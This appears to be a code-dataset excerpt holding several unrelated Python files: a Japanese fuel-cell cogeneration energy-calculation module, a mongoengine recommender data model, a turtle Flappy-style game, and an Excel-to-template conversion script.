"""1時間当たりのバックアップボイラーが分担する温水暖房熱負荷 (MJ/h) (8)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/h)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
Q_gen_HWH_d(ndarray): 1日当たりの温水暖房の排熱利用量 (MJ/h)
Returns:
ndarray: 1時間当たりのバックアップボイラーが分担する温水暖房熱負荷 (MJ/h)
"""
L_BB_HWH_d_t = np.zeros(24 * 365)
L_HWH_d = np.repeat(L_HWH_d, 24)
Q_gen_HWH_d = np.repeat(Q_gen_HWH_d, 24)
# L_HWH_d ≠ 0 の場合
f1 = (L_HWH_d > Q_gen_HWH_d)
L_BB_HWH_d_t[f1] = L_HWH_d_t[f1] - Q_gen_HWH_d[f1] * (L_HWH_d_t[f1] / L_HWH_d[f1])
# L_HWH_d = 0 の場合
f2 = (L_HWH_d <= Q_gen_HWH_d)
L_BB_HWH_d_t[f2] = 0
return L_BB_HWH_d_t
# ============================================================================
# 14. 発電ユニット
# ============================================================================
# ============================================================================
# 14.1 排熱利用量
# ============================================================================
def get_Q_gen_x_d(exhaust, exhaust_priority, Q_PU_gen_d, r_DHW_gen_PU_d, r_HWH_gen_PU_d, L_DHW_d, L_HWH_d):
"""1日当たりの給湯・温水暖房の排熱利用量 (MJ/d) (9)(10)(11)
Args:
exhaust(bool): 温水暖房への排熱利用がある場合はTrue
exhaust_priority(str): 温水暖房への排熱利用がある場合の排熱の優先先
Q_PU_gen_d(ndarray): 1日当たりの発電ユニット排熱量 (MJ/d)
r_HWH_gen_PU_d(ndarray): 発電ユニットの温水暖房排熱利用率 (-)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
r_DHW_gen_PU_d: returns: 1日当たりの給湯・温水暖房の排熱利用量をそれぞれ (MJ/d)
Returns:
tuple: 1日当たりの給湯・温水暖房の排熱利用量をそれぞれ (MJ/d)
"""
if exhaust == False:
# (9b)
Q_gen_HWH_d = np.zeros(365)
# (9a)
Q_gen_DHW_d = np.clip(Q_PU_gen_d * r_DHW_gen_PU_d, None, L_DHW_d)
elif exhaust_priority == '給湯優先':
# (10a)
Q_gen_DHW_d = np.clip(Q_PU_gen_d * r_DHW_gen_PU_d, None, L_DHW_d)
# (10b)
Q_gen_HWH_d = np.clip((Q_PU_gen_d - Q_gen_DHW_d) * r_HWH_gen_PU_d, None, L_HWH_d)
elif exhaust_priority == '温水暖房優先':
# (11a)
Q_gen_HWH_d = np.clip(Q_PU_gen_d * r_HWH_gen_PU_d, None, L_HWH_d)
# (11b)
Q_gen_DHW_d = np.clip((Q_PU_gen_d - Q_gen_HWH_d) * r_HWH_gen_PU_d, None, L_DHW_d)
else:
raise ValueError((exhaust, exhaust_priority))
return Q_gen_DHW_d, Q_gen_HWH_d
def get_Q_PU_gen_d(E_G_PU_d, e_H_PU_d):
"""1日当たりの発電ユニット排熱量 (12)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
e_H_PU_d(ndarray): 発電ユニットの日平均排熱効率 (-)
Returns:
ndarray: 1日当たりの発電ユニット排熱量 (MJ/d)
"""
return E_G_PU_d * e_H_PU_d
# ============================================================================
# 14.2 発電量
# ============================================================================
def get_E_E_gen_PU_d_t(E_G_PU_d_t, e_E_PU_d):
"""1時間当たりの発電ユニットの発電量 (kWh/h) (13)
Args:
E_G_PU_d_t(ndarray): 1時間当たりの発電ユニットのガス消費量 (MJ/h)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 発電ユニットの発電量 (kWh/h)
"""
e_E_PU_d = np.repeat(e_E_PU_d, 24)
E_E_gen_PU_d_t = E_G_PU_d_t * e_E_PU_d / 3.6
return E_E_gen_PU_d_t
# ============================================================================
# 14.3 ガス消費量
# ============================================================================
def calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d):
"""1時間当たりの発電ユニットのガス消費量 (MJ/h) (14a)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力力負荷 (kWh/d)
E_E_PU_d_t(ndarray): 1時間当たりの発電ユニットの分担可能電力力負荷 (kWh/h)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 1時間当たりの発電ユニットのガス消費量 (MJ/h)
"""
# 日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d) (14c)
E_dash_G_PU_d_h = get_E_dash_G_PU_d_h(E_E_PU_d_t, e_E_PU_d)
# 日付dにおける発電ユニットの稼働開始時刻 (h) (14b)
t_star_PU_start_d = get_t_star_PU_start_d(E_G_PU_d, E_dash_G_PU_d_h)
# 時刻tの表を作成
t = np.tile(np.arange(24), 365)
# 計算結果格納領域
E_G_PU_d_t = np.zeros(24 * 365)
# 計算用に24時間化
E_G_PU_d = np.repeat(E_G_PU_d, 24)
e_E_PU_d = np.repeat(e_E_PU_d, 24)
t_star_PU_start_d = np.repeat(t_star_PU_start_d, 24)
# E_dash_G_PU_d_h の1時間後の配列の作成
E_dash_G_PU_d_h_plus_1h = np.roll(E_dash_G_PU_d_h, -1)
# 条件1: t_star_PU_start_d < 23 and t < t_star_PU_start_d
f1 = np.logical_and(t_star_PU_start_d < 23, t < t_star_PU_start_d)
E_G_PU_d_t[f1] = 0
# 条件2: t_star_PU_start_d < 23 and t = t_star_PU_start_d
f2 = np.logical_and(t_star_PU_start_d < 23, t == t_star_PU_start_d)
E_G_PU_d_t[f2] = E_G_PU_d[f2] - E_dash_G_PU_d_h_plus_1h[f2]
# 条件3: t_star_PU_start_d < 23 and t > t_star_PU_start_d
f3 = np.logical_and(t_star_PU_start_d < 23, t > t_star_PU_start_d)
E_G_PU_d_t[f3] = E_E_PU_d_t[f3] * 3.6 / e_E_PU_d[f3]
# 条件4: t_star_PU_start_d = 23 and t < t_star_PU_start_d
f4 = np.logical_and(t_star_PU_start_d == 23, t < t_star_PU_start_d)
E_G_PU_d_t[f4] = 0
# 条件5: t_star_PU_start_d = 23 and t = t_star_PU_start_d
f5 = np.logical_and(t_star_PU_start_d == 23, t == t_star_PU_start_d)
E_G_PU_d_t[f5] = E_G_PU_d[f5]
return E_G_PU_d_t
def get_t_star_PU_start_d(E_G_PU_d, E_dash_G_PU_d_h):
"""日付dにおける発電ユニットの稼働開始時刻 (h) (14b)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
E_dash_G_PU_d_h(ndarray): 日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d)
Returns:
ndarray: 日付dにおける発電ユニットの稼働開始時刻 (h)
"""
# 0,1,2,3...23, 0,1,2...23, .. と 24*365のインデックスを作成
index_map = np.tile(np.arange(24), 365)
# E_G_PU_d <= E_dash_PU_d_h を満たすインデックスをTrueにする
bool_map = np.repeat(E_G_PU_d, 24) <= E_dash_G_PU_d_h
# index_map のうち、 bool_mapがFalseになっている箇所を0にする
index_map = index_map * bool_map
# index_map を 365 * 24 の2次元配列にする
index_map = np.reshape(index_map, (365, 24))
# 1日単位で最大のインデックスを取得
t_star_PU_start_d = np.max(index_map, axis=1)
return t_star_PU_start_d
def get_E_dash_G_PU_d_h(E_E_PU_d_t, e_E_PU_d):
"""日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d) (14c)
Args:
E_E_PU_d_t(ndarray): 日付dの時刻tにおける1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
e_E_PU_d(ndarray): 日付dにおける発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d)
"""
E_E_PU_d_t = np.reshape(E_E_PU_d_t, (365, 24))
E_dash_G_PU_d_h = np.zeros((365, 24))
for h in range(24):
E_dash_G_PU_d_h[:, h] = np.sum(E_E_PU_d_t[:, h:24], axis=1) * 3.6 / e_E_PU_d
return np.reshape(E_dash_G_PU_d_h, 24*365)
def get_E_G_PU_d(PU_type, E_G_PU_EVt_d, E_G_PU_HVt_d=None):
"""1日当たりの発電ユニットのガス消費量 (MJ/d) (15)
Args:
PU_type(str): 発電ユニットの発電方式
E_G_PU_EVt_d(ndarray): 1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d)
E_G_PU_HVt_d(ndarray, optional): 1日当たりの発電ユニットの排熱量推定時の仮想ガス消費量 (MJ/d) (Default value = None)
Returns:
ndarray: 1日当たりの発電ユニットの燃料消費量 (MJ/d)
"""
if PU_type == '熱主':
# (15a)
return np.clip(E_G_PU_EVt_d, None, E_G_PU_HVt_d)
elif PU_type == '電主':
# (15b)
return E_G_PU_EVt_d
else:
raise ValueError(PU_type)
def get_E_G_PU_EVt_d(E_E_gen_PU_EVt_d, e_E_PU_d):
"""1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d) (16)
Args:
E_E_gen_PU_EVt_d(ndarray): 1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 1日当たりの発電ユニットの発電量推定時の仮想燃料消費量 (MJ/d)
"""
return E_E_gen_PU_EVt_d * 3.6 / e_E_PU_d
def get_E_E_gen_PU_EVt_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, c):
"""1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d) (17)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パラメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
c(float): パラメータ c
Returns:
ndarray: 1日当たりの発電ユニットの発電量推定時の仮想発電量
"""
E_E_gen_PU_EVt_d = np.clip(a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b, None,
E_E_PU_d * c * 3.6) / 3.6
return E_E_gen_PU_EVt_d
def get_E_G_PU_HVt_d(e_H_PU_d, L_DHW_d, L_HWH_d, r_H_gen_PU_HVt_d, a_DHW, a_HWH):
"""1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d) (18)
Args:
e_H_PU_d(ndarray): 発電ユニットの日平均排熱効率 (-)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
r_H_gen_PU_HVt_d(ndarray): 発電ユニットの排熱量推定時の仮想排熱量上限比 (-)
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
Returns:
ndarray: 1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d)
"""
E_G_PU_HVt_d = (a_DHW * L_DHW_d + a_HWH * L_HWH_d) * r_H_gen_PU_HVt_d / e_H_PU_d
return E_G_PU_HVt_d
def get_r_H_gen_PU_HVt_d(L_DHW_d, L_HWH_d, a_DHW, a_HWH, b):
"""発電ユニットの排熱量推定時の仮想排熱量上限比 (-) (19)
Args:
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
Returns:
ndarray: 発電ユニットの排熱量推定時の仮想排熱量上限比
"""
r_H_gen_PU_HVt_d = a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return r_H_gen_PU_HVt_d
# ============================================================================
# 14.4 発電効率
# ============================================================================
def get_e_E_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, e_E_PU_d_max, e_E_PU_d_min):
"""発電ユニットの日平均発電効率 (-) (20)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パレメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
e_E_PU_d_max(float): 上限値
e_E_PU_d_min(float): 下限値
Returns:
ndarray: 発電ユニットの日平均発電効率 (-)
"""
e_E_PU_d = a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return np.clip(e_E_PU_d, e_E_PU_d_min, e_E_PU_d_max)
# ============================================================================
# 14.5 排熱効率
# ============================================================================
def get_e_H_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, e_H_PU_d_min, e_H_PU_d_max):
"""発電ユニットの日平均排熱効率 (-) (21)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚をの除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パレメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
e_H_PU_d_max(float): 上限値
e_H_PU_d_min(float): 下限値
Returns:
ndarray: 発電ユニットの日平均排熱効率 (-)
"""
e_H_PU_d = a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return np.clip(e_H_PU_d, e_H_PU_d_min, e_H_PU_d_max)
# ============================================================================
# 14.6 分担可能電力負荷
# ============================================================================
def get_E_E_PU_d(E_E_PU_d_t):
"""1日当たりの発電ユニットの分担可能電力負荷 (kWh/d) (22)
Args:
E_E_PU_d_t(ndarray): 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
Returns:
ndarray: 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
"""
tmp = E_E_PU_d_t.reshape((365, 24))
E_E_PU_d = np.sum(tmp, axis=1)
return E_E_PU_d
def get_E_E_PU_d_t(E_E_dmd_PU_d_t, P_rtd_PU, reverse):
"""1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h) (23)
Args:
E_E_dmd_PU_d_t(ndarray): 1時間当たりの発電ユニットの電力需要 (kWh/h)
P_rtd_PU(int): 定格発電出力 (W)
reverse(bool): 逆潮流の有無
Returns:
ndarray: 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
"""
if reverse == False:
return np.clip(E_E_dmd_PU_d_t, None, P_rtd_PU * 10 ** (-3))
else:
return np.ones_like(E_E_dmd_PU_d_t) * P_rtd_PU * 10 ** (-3)
def get_E_E_dmd_PU_d_t(E_E_dmd_d_t, E_E_TU_aux_d_t):
"""発電ユニットの電力需要 (kWh/h) (24)
Args:
E_E_dmd_d_t(ndarray): 1時間当たりの電力需要 (kWh/h)
E_E_TU_aux_d_t(ndarray): 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
Returns:
発電ユニットの電力需要 (kWh/h)
"""
E_E_dmd_PU_d_t = E_E_dmd_d_t + E_E_TU_aux_d_t
return E_E_dmd_PU_d_t
# ============================================================================
# 15. タンクユニットの補機消費電力
# ============================================================================
def get_E_E_TU_aux_d_t(E_E_TU_aux_DHW_d_t, E_E_TU_aux_HWH_d_t, E_E_TU_aux_ba2_d_t):
"""1時間当たりのタンクユニットの補機消費電力量 (25)
Args:
E_E_TU_aux_DHW_d_t(ndarray): 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_HWH_d_t(ndarray): 1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_ba2_d_t(ndarray): 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
Returns:
ndarray: 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_d_t = E_E_TU_aux_DHW_d_t + E_E_TU_aux_HWH_d_t + E_E_TU_aux_ba2_d_t
return E_E_TU_aux_d_t
def get_E_E_TU_aux_DHW_d_t(P_TU_aux_DHW):
"""1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h) (26)
Args:
P_TU_aux_DHW(float): 給湯のタンクユニットの補機消費電力 (W)
Returns:
float: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_DHW_d_t = P_TU_aux_DHW * 10 ** (-3)
return E_E_TU_aux_DHW_d_t
def get_E_E_TU_aux_HWH_d_t(exhaust, P_TU_aux_HWH=None, r_WS_HWH_d_t=None):
"""1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h) (27)
Args:
exhaust(bool): 温水暖房への排熱利用がある場合はTrue
P_TU_aux_HWH(param r_WS_HWH_d_t: 温水暖房の温水供給運転率 (-), optional): 給湯のタンクユニットの補機消費電力 (W) (Default value = None)
r_WS_HWH_d_t(return: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h), optional): 温水暖房の温水供給運転率 (-) (Default value = None)
Returns:
ndarray: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
"""
if exhaust:
# -- ①温水暖房への排熱利用がある場合 --
E_E_TU_aux_HWH_d_t = P_TU_aux_HWH * r_WS_HWH_d_t * 10 ** (-3)
else:
# -- ②温水暖房への排熱利用がない場合 --
E_E_TU_aux_HWH_d_t = 73.0 * r_WS_HWH_d_t * 10 ** (-3)
return E_E_TU_aux_HWH_d_t
def calc_E_E_TU_aux_ba2_d_t(L_BB_DHW_ba2_d_t):
"""1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
Args:
L_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_ba2_d_t = bb_dhw.get_E_E_BB_aux_ba2_d_t(L_BB_DHW_ba2_d_t)
return E_E_TU_aux_ba2_d_t
def get_L_BB_DHW_ba2_d_t(L_dashdash_ba2_d_t):
"""1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h) (28)
Args:
L_dashdash_ba2_d_t(ndarray): 1 時間当たりの浴槽追焚時の太陽熱補正給湯熱負荷(MJ/h)
Returns:
ndarray: 1 時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷(MJ/h)
"""
return L_dashdash_ba2_d_t
# ============================================================================
# 16. その他
# ============================================================================
def get_L_DHW_d(L_DHW_d_t):
"""1日当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/d) (29)
Args:
L_DHW_d_t(ndarray): 1時間当たりの発電ユニットにおける浴槽追焚を除く給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの発電ユニットにおける浴槽追焚を除く給湯熱負荷 (MJ/d)
"""
L_DHW_d = np.sum(L_DHW_d_t.reshape(365, 24), axis=1)
return L_DHW_d
def get_L_DHW_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t, L_dashdash_b2_d_t,
L_dashdash_ba1_d_t):
"""1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (30)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/h)
"""
L_DHW_d_t = L_dashdash_k_d_t + L_dashdash_w_d_t + L_dashdash_s_d_t + L_dashdash_b1_d_t + L_dashdash_b2_d_t + L_dashdash_ba1_d_t
return L_DHW_d_t
def get_L_HWH_d(L_HWH_d_t):
"""1日当たりの温水暖房の熱負荷 (31)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの温水暖房の熱負荷 (MJ/d)
"""
# 8760時間の1次元配列を364x24の2次元配列に変換する
tmp = L_HWH_d_t.reshape((365, 24))
# 2次元目を合算して配列を1次元化
L_HWH_d = np.sum(tmp, axis=1)
return L_HWH_d
``` |
{
"source": "Jjjeaswn/simple-recommender",
"score": 2
} |
#### File: rs/data/mongo.py
```python
from mongoengine import *
connect('rs')
class Ratings(Document):
user_key = StringField()
item_key = StringField()
value = FloatField()
meta = {
'ordering': ['+user_key', '+item_key']
}
class Features(Document):
type = StringField()
key = StringField()
values = ListField()
meta = {
'ordering': ['+type', '+key']
}
class Predictions(Document):
user_key = StringField()
item_key = StringField()
value = FloatField()
class UserTopKItems(Document):
user = StringField()
items = ListField()
def load_features(key, ftype=None):
if ftype is None:
result = Features.objects(key=key).first()
else:
result = Features.objects(key=key, type=ftype).first()
if result is not None:
return result.values
else:
return None
def save_features(key, ftype=None, values=None):
if ftype is None:
Features.objects(key=key).update_one(values=values, upsert=True)
else:
Features.objects(key=key, type=ftype).update_one(values=values, upsert=True)
``` |
{
"source": "jjjihun/oss-mju-class-5team",
"score": 4
} |
#### File: oss-mju-class-5team/freegames/flappy.py
```python
from random import *
from turtle import *
from freegames import vector
writer = Turtle(visible=False)
state={'score':0}
bird = vector(0, 0)
balls = []
sizes = []
speeds = []
def tap(x, y):
"Move bird up in response to screen tap."
up = vector(0, 30)
bird.move(up)
def inside(point):
"Return True if point on screen."
return -200 < point.x < 200 and -200 < point.y < 200
def draw(alive):
"Draw screen objects."
clear()
goto(bird.x, bird.y)
if alive:
dot(10, 'green')
else:
dot(10, 'red')
writer.write(state['score'])
index = 0
for ball in balls:
goto(ball.x, ball.y)
dot(sizes[index], 'black')
index +=1
update()
def move():
"Update object positions."
bird.y -= 5
index=0
for ball in balls:
ball.x -= speeds[index]
index += 1
if randrange(10) == 0:
y = randrange(-199, 199)
ball = vector(199, y)
size = randrange(10,40)
speed = randrange(1,10)
balls.append(ball)
sizes.append(size)
speeds.append(speed)
state['score'] += 1
while len(balls) > 0 and not inside(balls[0]):
balls.pop(0)
sizes.pop(0)
speeds.pop(0)
if not inside(bird):
draw(False)
return
for ball in balls:
if abs(ball - bird) < 15:
draw(False)
writer.write(state['score'])
return
draw(True)
ontimer(move, 50)
setup(420, 420, 370, 0)
hideturtle()
tracer(False)
writer.hideturtle()
writer.penup()
writer.goto(190,190)
writer.color('black')
up()
onscreenclick(tap)
move()
done()
``` |
{
"source": "JJJJane/DFA-template",
"score": 3
} |
#### File: excel_to_config/read_excel_to_config/read_excel_to_config.py
```python
import pandas as pd
import codecs
import os
import shutil
import json
def copy_file(sourceSrcfile, dsDir):
if os.path.exists(dsDir) is False:
os.makedirs(dsDir)
if os.path.isfile(sourceSrcfile):
shutil.copy(sourceSrcfile, dsDir)
print('copy file {} ==> {}'.format(sourceSrcfile, dsDir))
def copy_files_to_dir(sourceSrcfiles, dsDir):
for file in sourceSrcfiles:
copy_file(file, dsDir)
def read_excel_to_template(source_file, target_file, intent_type):
excel_file = pd.read_excel(source_file, sheet_name=intent_type)
op = excel_file.动作
entity = excel_file.实体
domain = excel_file.domain
intent = excel_file.意图
hard_code = excel_file.hard_code
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for o, e, d, i, h in zip(op, entity, domain, intent, hard_code):
if pd.isna(h):
h = 0
if not pd.isna(o) and not pd.isna(e):
print(o + e, d, i, int(h), file=f, sep=',', end='\r\n')
print(e + o, d, i, int(h), file=f, sep=',', end='\r\n')
elif pd.isna(o) and not pd.isna(e):
print(e, d, i, int(h), file=f, sep=',', end='\r\n')
# skip blank line
elif pd.isna(o) and pd.isna(e) and pd.isna(d) and pd.isna(i):
pass
else:
raise ValueError('Invalid data format')
def read_excel_to_entity(source_file: str, target_file: str, sheet_name='实体词') -> None:
excel_file = pd.read_excel(source_file, sheet_name=sheet_name)
entity = excel_file.实体词
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for e in entity:
if not pd.isna(e):
print(e, file=f, sep='', end='\r\n')
# skip blank line
elif pd.isna(e):
pass
else:
raise ValueError('Invalid data format')
def read_excel_to_op(source_file: str, target_file: str, sheet_name='动作词') -> None:
excel_file = pd.read_excel(source_file, sheet_name=sheet_name)
op = excel_file.动作词
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for o in op:
if not pd.isna(o):
print(o, file=f, sep='', end='\r\n')
# skip blank line
elif pd.isna(o):
pass
else:
raise ValueError('Invalid data format')
def save_json_file(json_string, file):
with codecs.open(file, 'w', 'utf-8') as _out:
_out.write(json.dumps(json_string, ensure_ascii=False, indent=2))
_out.flush()
_out.close()
if __name__ == '__main__':
BASE_DIR = '../../../'
read_excel_to_template(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/symp_template.list',
intent_type='意图说法表')
read_excel_to_entity(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/entity.txt',
sheet_name='实体词')
read_excel_to_op(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/op.txt',
sheet_name='动作词')
dsDir = BASE_DIR + 'model/rules/'
sourceSrcfiles = [BASE_DIR + 'model/excel_to_config/excel_data/symp_template.list',
]
copy_files_to_dir(sourceSrcfiles, dsDir)
dsDir = BASE_DIR + 'model/corpus/'
sourceSrcfiles = [BASE_DIR + 'model/excel_to_config/excel_data/op.txt',
BASE_DIR + 'model/excel_to_config/excel_data/entity.txt'
]
copy_files_to_dir(sourceSrcfiles, dsDir)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.